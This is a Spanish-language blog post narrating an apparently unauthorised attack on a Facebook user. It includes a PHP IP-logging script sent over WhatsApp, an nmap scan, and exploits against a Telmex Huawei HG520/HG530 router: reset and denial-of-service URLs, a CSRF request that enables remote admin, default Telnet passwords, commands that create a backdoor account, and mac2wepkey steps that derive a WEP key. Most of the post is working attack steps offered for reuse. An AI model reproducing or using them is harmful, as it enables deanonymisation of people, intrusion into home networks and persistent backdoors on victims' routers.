Hacking Remote Router

Se me ha dado el trabajo que encontrar la información que pueda acerca de un objetivo. Resulta que era una persona que publicaba noticias falsas e inapropiadas para muchas gentes y lo curioso que mucha gente lo sigue por facebook.

Los datos que se me proporcionaron acerca del objetivo fueron los siguientes (Bastantes escasos):

  • Facebook del objetivo

Eso no me sirve de mucho debido a que ni si quiera el nombre que tenia en el facebook era real, todo su información en su perfil era falso. Entonces lo primero que hice fue agregarlo como amigo, aunque no era necesario porque solo ocupada enviarle un mensaje para este tipo de ataque.

El contenido del script php era este:

<?php $file = "log.txt"; $dump = print_r($_SERVER, TRUE).PHP_EOL.print_r($_REQUEST, TRUE); file_put_contents($file, $dump, FILE_APPEND | LOCK_EX); ?>
<html>
<head>
<title>WatsApp P0c</html>
<meta property="og:image" content="http://sitio.com.mx/imagen.png"/>
</head>
<body>
<h1>WhatsApp Meta_Image P0c</h1>

Ese script lo utilizaba para obtener la dirección IP de un usuario de whatsapp con solo mandarle un link por chat (sin necesidad que la víctima lo habrá), el property=”og:image” hacía esa función de descargar la imagenpara darle una vista representativa del envío del link, algo muy común que sucede con Facebook.

Después cheque el log.txt, vemos la dirección IP y donde a través del USER_AGENT nos damos cuenta de que se trata de un android 4.0.3.

Una vez obtenida la IP, le hize un scan con nmap para ver los puertos abiertos:


Como vemos tiene el puerto 80 abierto, entonces lo que hice fue abrirlo con el navegador porque de seguro tiene un servicio web corriendo, y pues resultó positivo, apareció la interfaz del logueo del router , estuve investigando y halle una página (popup) donde me decía un mensaje de error de inicio de sesión:

Ahora tengo la siguiente información:

  • Pertenece a TELMEX
  • El modelo es un Huawei HG530

Para intentar loguear en la página de configuración del módem ocupaba las credenciales.Estuve haciendo una investigación y este tipo de router no tiene un password por default como muchos si no que es de la manera siguiente el sistema de autenticación:

  • Usuario: TELMEX (con mayúsculas)
  • Contraseña: WepKey (10 números de la etiqueta)

Después de ver esto ya parecia imposible tratar de hacer algo debido a lo anterior, entonces busque haber si existian algunos exploits para este tipo de router. Encontré algunos exploits (Unos funcionaban bien y otros no):

Revelación de información, supuesta mente pero no se encontró
http://foro.elhacker.net/bugs_y_exploits/huawei_echolife_hg520c_revelacion_de_informacion-t295488.0.html

http://189.186.***.*/Listadeparametros.html

Es probable que no se haya encontrado la página debido a la versión que esté manejando el software interno del router.

Resetear del modem
Esta función lo que hace es resetear el router a su configuración inicial, es decir si el vecino te cambia la contraseña solo haces esto, y ya tendrás la misma clave del wifi que venia desde fábrica.(La he probado y funciona de maravilla).

http://www.exploit-db.com/exploits/12297/
http://189.186.***.*/AutoRestart.html

Ataque DDOS (Dejar a la victima sin internet)
http://www.exploit-db.com/exploits/12297/
Sucede cuando el valor de la variable index, tiene una longitud mayor a 7.

/rpLocalDeviceJump.html?index=HAKIM.WS

Huawei EchoLife HG520c HTTP Basic Auth D.O.S
Al entrar a ‘http://189.186.***.*/’ y logearse con USER y PASSWORD mayor a 130 caracteres se produce la denegación de servicio reinicia el dispositivo.

http://0x4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@189.186.***.*

Revelación de la versión del router
No necesita autentificación (Descubierta por nuestro equipo)

http://189.186.***.*/Adminhint_switch.html

HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
El autor del exploit es hkm
http://hkm.diosdelared.com/index.php?coment=7237

Device: Huawei EchoLife HG520
Software Version: V100R001B021Telmex
V100R001B020Telmex
Firmware Version: 3.10.18.7-1.0.7.0 (latest version)
3.10.18.5-1.0.7.0
Vulnerable Models: HG520c
HG520b
Published date: 2010-04-00
Criticity: High
Impact: Enable remote admin on WAN
Location: Web interface (LAN/WAN)
Solution: Not available
Exploit
http://189.186.***.*/Forms/rpRManage_1?ACL_active=0

Los módems HG520 publican una interfaz de administración vía web en la red local. Las paginas ‘/Forms/access_cwmp_1’, ‘/Forms/rpQos_1’ y ‘/Forms/rpRManage_1’ no requieren autenticación, se puede realizar un ataque de CSRF para habilitar el acceso a las interfaces de administración desde Internet.

Se habilita el acceso remoto por FTP, TELNET y WEB mandando una petición GET a:

http://189.186.***.*/Forms/rpRManage_1?ACL_active=0

Se podria usar Client-Side visitando una pagina que contenga:

http://189.186.***.*/Forms/rpRManage_1?ACL_active=0

Una vez habilitado telnet a través del exploit anterior, entramos por el puerto 23 para comprobar si realmente lo habilitó.
Estuve investigando por un largo tiempo el password para poder loguearse ya que no funcionaba un típico root/root, hasta que en un momento dí con la contraseña.

Los routers Huawei HG520 y HG530 tienen un password por default en Telnet.

  • Acceso por telnet: La password es Terminal o TerminalHw

Los comandos a ejecutar desde la consola no son iguales por ejemplo a un router de marca Cisco.

Como ven al principio del post comentábamos de que se trataba de un HG530, y aquí el Telnet nos está diciendo que es un HG520, lo cual posiblemente no esté indicando que son muy parecidos o iguales estos dos.

Entonces ejecutando un comando inválido podremos ver los comandos que se pueden ejecutar en este modelo:

Comencé utilizando para mostrar las credenciales de logueo de la interfaz web, en algunos routers funciona pero en esta marca no fue el caso, no funcionó.
HG520c&gt; login show

Renovar la ip del router
wan adsl reset

Obtención de información del router


Con el comando sys se pueden hacer cosas interesantes.

Cambiar las claves de acceso por HTTP
Cambiar el usuario a admin

sys adminname admin

En teoría debería de salir : new administrator name is: admin.

Cambiar el password

sys password admin

Crear un backdoor

sys multiuser on|backd backd

Como la IP es dinámica tendríamos que asignarle un dns como dyndns.

Activar multiusuario

sys multiuser on

Con esto podremos accesar vía web a la configuración del módem, con menos privilegios ya que es un segundo usuario, y el primer usuario es el de TELMEX.

Huawei HG520 Telnet Fakemac Mac2wepkey
https://www.underground.org.mx/?topic=25857.0

Estos routers forman su WEP KEY predeterminada con el comando ‘mac2wepkey’ disponible vía TELNET. Es posible ponerle a un HG520 la dirección MAC de otro y así generar su WEP KEY y SSID.

1) Ingresar por telnet al router
telnet 189.186.***.*
Password: **********

2) Para configurar la nueva MAC escribimos:
wan fakemac 00:25:68:db:56:0f

3) Verificamos el cambio:
wan fakemac pvc disp

4) Habilitamos la función:
rt mac2wepkey on

5) Finalmente generamos la WEP KEY:
rt mac2wepkey ssid INFINITUM

Ver video: http://www.hakim.ws/huawei/mac2wepkey.ogv
Saludos a todos!!!
#zer0max

Deja un comentario